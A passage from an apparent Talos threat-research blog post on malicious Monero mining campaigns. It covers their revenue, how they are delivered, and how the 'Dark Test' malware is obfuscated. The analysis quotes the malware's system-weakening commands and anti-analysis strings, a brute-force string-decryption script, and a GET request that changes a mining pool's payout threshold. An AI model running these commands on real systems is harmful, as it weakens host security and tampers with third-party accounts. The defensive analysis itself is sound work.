source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few. \n \nSo why choose crypto mining software? \n \nThere are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity. \n \nThe biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin. \n \nLet's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly. \n \nSome of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue. \n \nIn one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero. \n\n\n[](<https://3.bp.blogspot.com/-MG_1-PGHnRc/WnG2S4DYdCI/AAAAAAAAAkQ/wm5t4BG-cyQT8H5R0SvXpiTP-vQ0i2CKQCLcBGAs/s1600/image21.png>)\n\n**Worker ID Statistics**\n\n \nIn a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software. \n\n\n[](<https://4.bp.blogspot.com/-M5-8y8Fx7Yo/WnG2YgVvaQI/AAAAAAAAAkU/ZVgb1EDHpsERm40rt653hTMYUH1Qvh51ACLcBGAs/s1600/image31.png>)\n\n**Historical Hash Rate**\n\n \nIn analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s. \n\n\n[](<https://3.bp.blogspot.com/-pjStDnu5oE8/WnG2d2dGbvI/AAAAAAAAAkY/Rxy4y24ajzQfDgPsl0EfQA9VeuZ5BDQegCLcBGAs/s1600/image11.png>)\n\n**Current Hash Rate**\n\n \nUsing an online calculator that takes hash rate, power consumption and cost then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers. \n \nAnalyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884. \n\n\n[](<https://2.bp.blogspot.com/-cBKLUb4FJsY/WnG2jRgOLaI/AAAAAAAAAkc/vkIhD0cKfXUcw-bRIzTnENRE5fY7kDHTACLcBGAs/s1600/image5.png>)\n\n**Worker ID Payment History**\n\n \nWhile analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach. \n\n\n[](<https://3.bp.blogspot.com/-iFc7bTVYL4I/WnG3Ofd1fiI/AAAAAAAAAkw/OW1LuQqLbnYWaFFq3VVfkq-rxkwbhPc4ACLcBGAs/s1600/table.png>)\n\n**High Volume Calculations**\n\n \nOne additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place. \n \n\n\n## Threats Delivering Miners\n\n \nCryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation. \n\n\n### Email Based\n\n \nThere are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreants worker ID and pool, allowing attackers to reap the mining benefits. \n \nBelow is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate. \n\n\n[](<https://3.bp.blogspot.com/-HN1jDjRs9NA/WnG3ofsv07I/AAAAAAAAAk0/4X5qS3uMf18a-Kp7PAKUc-glbFynIHzSQCLcBGAs/s1600/image24.png>)\n\n**Example Malicious Email**\n\n \nAs you can see the email contains a word document which, when opened, looks like the following. \n\n\n[](<https://2.bp.blogspot.com/-YCNN3stnTLI/WnG3utpzHHI/AAAAAAAAAk4/cCbjw9yYuCgHf0Q5TZgqKlXA6OBCPxb_ACLcBGAs/s1600/image4.png>)\n\n**Example Word Document**\n\n \nAs is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used. \n \nThis image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function: \n\n\n[](<https://4.bp.blogspot.com/-dyl8BOtHiUE/WnG303uF5iI/AAAAAAAAAk8/B-VcgP43bnU3nMYcTAfcxrp_IwAxif2ewCLcBGAs/s1600/image22.png>)\n\n**Highly Obfuscated VBA Macros Using Document_Open()**\n\n \n\n\nThe macro leads to a call to a Shell command: \n\n\n[](<https://1.bp.blogspot.com/-XOkkw3a6yUE/WnG4AVkCURI/AAAAAAAAAlA/VrDifm1A5oovDdn32WTa6HO76vUcmQJtQCLcBGAs/s1600/image32.png>)\n\n**Highly Obfuscated VBA Macro VBA.Shell Call**\n\n \nWe can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call: \n\n\n[](<https://2.bp.blogspot.com/--COaPZAv6Ew/WnG4LxL9dfI/AAAAAAAAAlE/GYytdgVpwOsm3yOL6Zh-z_UQAvlPFI6AQCLcBGAs/s1600/image30.png>)\n\n**MsgBox for Shell Replacement**\n\n \nThis will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid: \n\n\n[](<https://2.bp.blogspot.com/-mmTPAo0x4MQ/WnG4WK_-dTI/AAAAAAAAAlQ/J_DdWb9W-BsYAda0piFe3P56gM_gGVrTQCLcBGAs/s1600/image10.png>)\n\n**Office Document Launches a Powershell Indicator in Threat Grid**\n\n \nWe also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension: \n\n\n[](<https://2.bp.blogspot.com/-YzD2ro54GK0/WnG5aJkJG5I/AAAAAAAAAlg/0ehj3iBDLigETrSyPdQvkcM7NJB5qr7OwCLcBGAs/s1600/image19.png>)\n\n**Portable Executable Image Extension Identification Threat Grid**\n\n \nIn this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid: \n\n\n[](<https://3.bp.blogspot.com/-oAAn84JRp6M/WnG5k-T3a2I/AAAAAAAAAlk/RrVDgGKgj90yTIzm_Bap_fG6o9T89qdgwCLcBGAs/s1600/image20.png>)\n\n**xmrig Execution in Threat Grid**\n\n \nDynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory: \n\n\n[](<https://1.bp.blogspot.com/-AniIUgZrSrA/WnG5ui4mMwI/AAAAAAAAAlo/SgG7inliyH8OQPc9WLo_oug-1ct2g04dwCLcBGAs/s1600/image13.png>)\n\n**Dynamic Miner Execution in AMP for Endpoint's Device Trajectory**\n\n \nMining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments: \n\n\n[](<https://4.bp.blogspot.com/-TJimRD6275k/WnG53Hz4rCI/AAAAAAAAAls/8Ahjkqr-spA-ffuY1RQ0SWRpZ2dkQnDegCLcBGAs/s1600/image12.png>)\n\n**Mining Traffic Classification using Cognitive Threat Analytics**\n\n \n\n\n### Dark Test Cryptomining Malware\n\n \nDark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail. \n \n\n\n### Dark Test Obfuscation\n\n \nDark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize. \n \nDark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer: \n\n\n[](<https://2.bp.blogspot.com/-FW3xpQMFWTQ/WnG5_oHjZ7I/AAAAAAAAAlw/BiZn3XD0hlwNOu4QsRcNJPWt6FsOLshjwCLcBGAs/s1600/image29.png>)\n\n**Dynamic Method Resolution Using metadataToken Integer**\n\n \nFunctions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters: \n\n\n[](<https://4.bp.blogspot.com/-BxKE4FUS_xo/WnG6HeOmbpI/AAAAAAAAAl0/iH44lM8q1Wo8CMZE61rxRgNrfLeUs_IeQCLcBGAs/s1600/image6.png>)\n\n**Runtime Resolved Function Calls using calli**\n\n \nThe decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset: \n\n\n[](<https://2.bp.blogspot.com/-5fAlSxHtsCs/WnG6PTD63ZI/AAAAAAAAAl8/WSBazviqxpMRnVke6nqudB0XZFWbrfDGgCLcBGAs/s1600/image27.png>)\n\n**Dark Test String Decryption Function**\n\n \nAt the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects: \n\n\n[](<https://3.bp.blogspot.com/-QHHC8NNpqhs/WnG6WuFY_3I/AAAAAAAAAmE/vyUgwV2z5egBm1veQbHpnJzX2_YsHa4agCLcBGAs/s1600/image17.png>)\n\n**Dark Test String Decryption Function Call**\n\n \nThe result, in this case, being the string \"-o pool.minexmr.com:4444 -u\" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use): \n\n\n[](<https://3.bp.blogspot.com/-Bnn3A7ixXqo/WnG6dckoDWI/AAAAAAAAAmI/TmyF9F_Qr5Ms7ycfr9SXEoE4p9N68VaCgCLcBGAs/s1600/image2.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \n\n\nRuntime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges: \n\n \n \n #!/usr/bin/ruby \n \n fr = File.read(ARGV[0]) \n fb = fr.bytes \n \n for i in 0..fb.length-4 \n #Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource \n if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28 \n #Perform their arithmetic with provided bytes into an 32-bit int \n length = [fb[i-1], 106, 242, 28].pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] - 5 ^ 485648943 \n seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]] \n seek_offset = (seek_offset_bytes.pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] ^ 2100157544) - 100 \n puts \"Found length of: #{length}\" \n puts \"Seek offset bytes: #{seek_offset_bytes.inspect}\" \n ciphertext = [] \n for j in 0..length-1 \n ciphertext << fb[seek_offset+j] \n end \n if length > 2 \n for x in 0x00..0xFF \n finished = true \n result = [] \n for c in ciphertext \n unless((x ^ c).between?(0x20,0x7E)) \n finished = false \n break \n end \n result << (x ^ c) \n end \n if finished \n puts \"Found possible XOR key for string: #{result.pack(\"I*\").split(\"\\x00\").join} of length: #{length}\" \n end \n end \n end \n end \n end \n \n \n\nThis brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining: \n\n \n \n /C net accounts /forcelogoff:no\n\nThis prevents forced logoffs from remote administrators. \n\n \n \n /C net accounts /maxpwage:unlimited\n\nThis sets the maximum password age to unlimited, which in turn prevents password expiry. \n\n \n \n /C powercfg /x /standby-timeout-ac 0\n\nThis will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle. \n\n \n \n /C reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99\n\nThis will prevent the screensaver from starting. \n \nFurther, observed strings are those for anti-analysis: \n\n \n \n procexp \n PROCEXP \n pROCESShACKER \n ProcessHacker \n procexp64 \n Detect detector! \n Clear! \n taskmgr\n\n### Dark Test Network traffic\n\n \nTwo GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip \n\n\n[](<https://3.bp.blogspot.com/-Qc4_UEtvGbQ/WnG6t_zCEDI/AAAAAAAAAmU/Tbbi2yeKVKkhvIOmytvbMe3huDcz2cZJwCLcBGAs/s1600/image18.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \nOddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments: \n\n\n[](<https://1.bp.blogspot.com/-8Tjmvd6M01E/WnG61VY3rZI/AAAAAAAAAmc/jUfzdPmMu38oApQ9rKvbqIutNJdpdgttQCLcBGAs/s1600/image33.png>)\n\n**Pastebin SQL Commands**\n\n \nThis further implies the possibility of a builder or distributed gateway being used. Further searches turned up a number of in-the-wild filenames which correspond to wares: \n\n\n[](<https://3.bp.blogspot.com/-lPM4zO7Yy-I/WnG6-j_QqsI/AAAAAAAAAmg/eb6YMKLP9m02kqcHC39H5BowbycRyZLmgCLcBGAs/s1600/image15.png>)\n\n**Dark Test VirusTotal Observed in-the-wild Filenames**\n\n \nThis could indicate warez as being a possible distribution vector for this malware. \n \n\n\n### Dark Test Version 2\n\n \nThroughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW: \n\n\n[](<https://3.bp.blogspot.com/-yMVA8UyzTPM/WnG7LBRPlAI/AAAAAAAAAmk/F1xZeoz6HuQ9IfwbpwapLaZ_XfFKSbucgCLcBGAs/s1600/image14.png>)\n\n**Anti-Analysis Strings**\n\n \nAn interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC. \n \n\n\n### Exploit Kit Based\n\n \nIn addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below: \n\n\n[](<https://4.bp.blogspot.com/-cRla5BFyQAo/WnG81bNNsbI/AAAAAAAAAm4/76tiUp0EMDIoF_TkhbSJyUWBXH02-upbACLcBGAs/s1600/image23.png>)\n\n**Command Line Syntax**\n\n \nUsing the Worker ID of: \n\n \n \n 43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD\n\nwe began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day. \n \nThat may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually. \n \nHowever, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec. \n\n\n[](<https://4.bp.blogspot.com/-S2jqc1PAgvQ/WnG9HDPM8zI/AAAAAAAAAm8/9BTHhW1hh2wYgMTCDMX4KXsFvaWSuElKQCLcBGAs/s1600/image16.png>)\n\n**Historical Hash Rate**\n\n \nThe campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader. \n \n\n\n### Active Exploitation\n\n \nIn addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently a Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain. \n \nWhen you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining. \n \n\n\n## Deeper Dive on Mining and Workers\n\n \nOver the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain. \n \nOne thing that has been common with most of the malicious miners we found were the filename choices. Threat actors have chosen filenames that look harmless, such as \"Windows 7.exe\" and \"Windows 10.exe\". Additionally, Talos commonly saw \"taskmgrss.exe\", \"AdobeUpdater64.exe\", and \"svchost.exe\". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below. \n\n\n[](<https://3.bp.blogspot.com/-4AgsOM4lq_Y/WnG9YRuQ6vI/AAAAAAAAAnA/0uu00Q-7QMQueR7KPdE5qKzbn_p0K3p9gCLcBGAs/s1600/image28.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product [Immunet](<http://www.immunet.com/index>). \n \n\n\n## Mining as a Payload for the Future\n\n \nCryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will be likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal. \n \nThe sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the later case ransomware can be used a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more. \n \nSimply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it. \n \nRecurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue. \n \nContinuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive. \n \n\n\n## Are Miners Malware?\n\n \nMining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network. \n \nIf a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors. \n \n\n\n## Enterprise Impacts\n\n \nRegardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments. \n \nThis is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin. \n \nDue to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such. \n \n\n\n## Fails we Found\n\n \nWhile investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below: \n\n\n[](<https://4.bp.blogspot.com/-gYfSx4Z3fR4/WnG9hB4ZaOI/AAAAAAAAAnE/EK10eb8tztI0t8vU5UKISuX3zSzLIVjPgCLcBGAs/s1600/image9.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves. \n\n\n[](<https://4.bp.blogspot.com/-Serv6ugXd5s/WnG9qlxt1GI/AAAAAAAAAnI/BQeRNxdbKKkQ3aOYZ2aZrGQFwAa74aOOgCLcBGAs/s1600/image34.png>)\n\n**Source Code Default Values**\n\n \nIn several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below: \n\n\n[](<https://2.bp.blogspot.com/--VxrS9BeGXA/WnG9ydG0RlI/AAAAAAAAAnM/j_rDz4bvK384-fHed56GXcDehQ9P-Dt_QCLcBGAs/s1600/image25.png>)\n\n**Mining Fail Example #1**\n\n[](<https://3.bp.blogspot.com/-w3Y6QyEIEP8/WnG96btX1wI/AAAAAAAAAnU/5jijQ_mBw6Q89KlaCgw506k5Ef2rNwBgwCLcBGAs/s1600/image8.png>)\n\n**Mining Fail Example #2**\n\n[](<https://1.bp.blogspot.com/-lzwj4E9U-0o/WnG-Cc7XTYI/AAAAAAAAAnY/MSP3Pngrk0AtEgq5ceto9lyo6cdNFF9lQCLcBGAs/s1600/image3.png>)\n\n**Mining Fail Example #3**\n\n[](<https://2.bp.blogspot.com/-boqhpLlFsxw/WnG-JhPkK6I/AAAAAAAAAnc/pZdDYcGpxw4B6pFIf6tV65MtkC9f9-7zACLcBGAs/s1600/image1.png>)\n\n**Mining Fail Example #4**\n\n \nThis clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks. \n \nAdditionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a \"Personal Threshold\" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure: \n \n\n \n \n \"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000\"\n\n \nWhere $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary. \n \n\n\n## Conclusion\n\n \nThe number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected. \n \nCrypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years. \n \nIt also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward. \n \n\n\n## Coverage\n\n \nThere are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550. \n \nAlso, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted. \n \n\n\n## IOC Section\n\n \n\n\n### IP Addresses:\n\n \n89.248.169[.]136 \n128.199.86[.]57 \n\n\n### \n\n### Domains:\n\n \nqyvtls749tio[.]com \nyouronionlink[.]onion \n \n\n\n### [File Hashes](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5a71e1c64654d.txt>)\n\n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=nyH5a-BdwkQ:qkNEPRJJDb0:yIl2AUoC8zA>)\n\n", "modified": "2018-01-31T16:34:16", "published": "2018-01-31T07:58:00", "id": "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nyH5a-BdwkQ/malicious-xmr-mining.html", "type": "talosblog", "title": "Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T19:09:28", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "description": "_This post was authored by [David Liebenberg](<https://twitter.com/chinahanddave>). _\n\n \n \n\n\n## Summary\n\n \nCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. \n \nIn this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe 